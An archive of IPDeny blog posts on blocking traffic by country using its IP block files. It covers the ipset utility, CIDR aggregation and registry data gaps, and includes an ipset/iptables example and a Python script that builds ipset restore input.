Archive for the ‘IPDeny’ Category

Blocking country IP tables using our data blocks and ipset utility

March 4th, 2012 12 comments

Just browsing around the Internet today I found a nice howto document explaining how to set up our country IP block data with the ipset utility. The ipset utility offers much higher performance than standard iptables rules (one record per IP range, e.g. 10.1.1.0/16).

Update: August 18th, 2012.
Thanks to our visitors' comments we checked the itech7 site and its registration had expired. We will probably come up with another reference/site shortly.

Categories: IPDeny Tags:

Problem with European IP blocks solved

August 6th, 2010 3 comments

We had a small problem with European IP address blocks that has now been resolved. The data files for some of the European countries didn’t list full IP blocks. Our apologies for the problem! Thanks for the notification, Joerg!


CIDR Zone file merging for higher performance

March 21st, 2010 6 comments

UPDATE: AUGUST 15th, 2014. IPv4 country aggregated IP address blocks are now offered for free download. Read our official blog post about aggregated IP address blocks and enjoy!

We got an email from a Cusimano.com person suggesting that we use the CIDR zone file merging script from zwitterion.org. We have run a few in-house tests and this Perl-based script effectively decreases the CIDR IP block count by up to 60% or even more.

The fewer firewall rules you have set up in your packet filter (server or firewall), the less matching needs to be done, which effectively decreases load and usage. In the upcoming week we will fully implement this feature in the freely available country zone files.

Thank you for your continued support and feel free to send us more suggestions or recommendations!


Missing or incorrect data in zone files

January 23rd, 2010 21 comments

Some of our zone data file users are complaining about IP errors, missing IP blocks or even incorrect data. Unfortunately, we compile our data from the regional registries: RIPE, ARIN, APNIC, AFRINIC, LACNIC and IANA. If a registry has a missing IP block in its data files, we will miss this IP block in our country zone files as well.

If you have complaints about IP zones that are wrong or not updated, please contact your local registry and ask them to change this information.


Using IP sets for best performance

November 29th, 2009 No comments

IP sets are the best method for blocking specific countries using our per-country IP prefix files.

From the IPset homepage:

IP sets are a framework inside the Linux 2.4.x and 2.6.x kernel, which can be administered by the ipset utility. Depending on the type, currently an IP set may store IP addresses, (TCP/UDP) port numbers or IP addresses with MAC addresses in a way, which ensures lightning speed when matching an entry against a set.

If you want to

  • store multiple IP addresses or port numbers and match against the collection by iptables at one swoop;
  • dynamically update iptables rules against IP addresses or ports without performance penalty;
  • express complex IP address and ports based rulesets with one single iptables rule and benefit from the speed of IP sets

If you have a network or server with high traffic and use standard iptables rules for traffic blocking, it may affect your server/network performance. With IP sets you can “group” multiple IP sets together and then match these in one swoop. This will provide you with top performance.

IP sets allow you to bind an entry in a set to another set, which forms a relationship between the set element and the set it is bound to. The sets may have a default binding, which is valid for every set element for which there is no binding defined at all.

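Example:

    # Set of server addresses
    ipset -N servers ipmap --network 10.10.10.0/16
    ipset -A servers 10.10.10.1
    ipset -A servers 10.10.10.2

    # Set of port numbers
    ipset -N ports portmap --from 1 --to 1024
    ipset -A ports 21
    ipset -A ports 22
    ipset -A ports 25

    # Bind the ports set to the element 10.10.10.2 of the servers set
    ipset -B servers 10.10.10.2 -b ports

    # One rule matches against the servers set and its binding; everything else is dropped
    iptables -A FORWARD -m set --set servers dst,dst -j ACCEPT
    iptables -A FORWARD -j DROP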
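
The two ideas from these posts combined, as an added example that is not IPDeny's or the ipset project's own code: merge a country zone file's CIDR blocks (done here with Python's `ipaddress` module rather than the Perl script mentioned above) and emit input for `ipset restore` that fills a scratch set and swaps it in. It uses the `hash:net` set type of current ipset releases instead of the legacy `ipmap`/binding syntax shown above; the sample ranges and the set name `geo-example` are assumptions.

```python
import ipaddress

# Constructed sample in the one-CIDR-per-line zone file layout (documentation
# ranges, not real country data); the set name "geo-example" is hypothetical.
SAMPLE_ZONE = """\
198.51.100.0/25
198.51.100.128/25
203.0.113.0/24
192.0.2.0/26
192.0.2.64/26
192.0.2.128/25
# comment lines and blanks are skipped
not-a-cidr
192.0.2.77/24
"""

def parse_zone(text):
    """Return (networks, rejected) from zone-file text, one CIDR per line."""
    nets, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            # strict=True rejects entries with host bits set (e.g. 192.0.2.77/24)
            nets.append(ipaddress.IPv4Network(line, strict=True))
        except ValueError:
            rejected.append(line)
    return nets, rejected

def aggregate(nets):
    """Merge adjacent and overlapping blocks into the fewest covering CIDRs."""
    return list(ipaddress.collapse_addresses(nets))

def ipset_restore_script(set_name, nets):
    """Build `ipset restore` input: fill a scratch set, then swap it in."""
    tmp = set_name + "-new"
    lines = [f"create {set_name} hash:net family inet",
             f"create {tmp} hash:net family inet",
             f"flush {tmp}"]
    lines += [f"add {tmp} {n}" for n in nets]
    lines += [f"swap {tmp} {set_name}", f"destroy {tmp}"]
    return "\n".join(lines) + "\n"

if __name__ == "__main__":
    nets, bad = parse_zone(SAMPLE_ZONE)
    merged = aggregate(nets)
    print(f"# {len(nets)} blocks -> {len(merged)} after merging; rejected: {bad}")
    print(ipset_restore_script("geo-example", merged), end="")
```

Load the output with `ipset -exist restore < file`, then reference the set from a single rule such as `iptables -I INPUT -m set --match-set geo-example src -j DROP`.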




Welcome to our new blog

May 19th, 2009 Comments off

Hello guys. Time is passing and we are finally introducing our new blog – IP Deny blog. We will publish IP, technical guides and hosting-related information.

I hope our upcoming posts will have huge interest from our site visitors and we will aim to publish interesting stuff, not junk.

All the best!
IPDeny Staff
